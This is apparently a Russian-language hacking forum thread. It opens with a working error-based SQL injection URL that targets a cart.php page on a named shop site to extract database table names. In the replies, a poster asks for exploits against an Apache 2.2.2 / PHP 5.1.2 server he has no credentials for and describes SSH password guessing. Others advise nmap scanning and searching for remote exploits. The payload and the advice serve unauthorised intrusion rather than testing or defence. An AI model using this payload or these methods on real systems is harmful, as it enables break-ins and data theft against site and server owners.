https://hiphop-dojo.com/order/cart.php?id=939'+and+1=(select+*+from(select+*+fro m(select+name_const((select+table_name+from+inform ation_schema.tables+limit+0,1),14)d)+as+t+join+(se lect+name_const((select+table_name+from+informatio n_schema.tables+limit+0,1),14)e)b)a)--+

Есть такой сервер: Apache/2.2.2 (ASPLinux) PHP/5.1.2
Не буду вдаваться в заумные слова. Есть ли хорошие дыры в этой вещи? Нормальный сплойтов не нашел(

ты еще в openssh дыры поищи...

Не я серьезно. Нужно позарез. Нашел порт, где "возможно" удаленно выполнение команд ssh, и на подбор пароля к ssh2.
PS "Возможно" в кавычках не зря((

а что значит "Нашел порт, где "возможно" удаленно выполнение команд ssh"
это как?

по всей видимости нашел там "возможности" какой нибудь сканер...

Да, сканер. Скажите беспонтово лезть на этот сервак? Это локальный сервер, не сайт.

просканируй сервак nmap-ом и ищи в гугле какой нить remote exploit!

nmap вообще не находит ни одного порта. Захлебывается на старте. Я уже писал выше, этот сервер не пингуется. На запрос по локальному IP - в браузере чистая страница с чистым исходником. Пробую через веб на IP через ssh порт - показывает версию ssh и все. Вход на ssh через putty закрыт. Ни логина ни пароля мне неизвестно.
Я с ним скоро с ума сойду. Дни и ночи напролет, и на одном месте. Знания, походу, не позволяют(((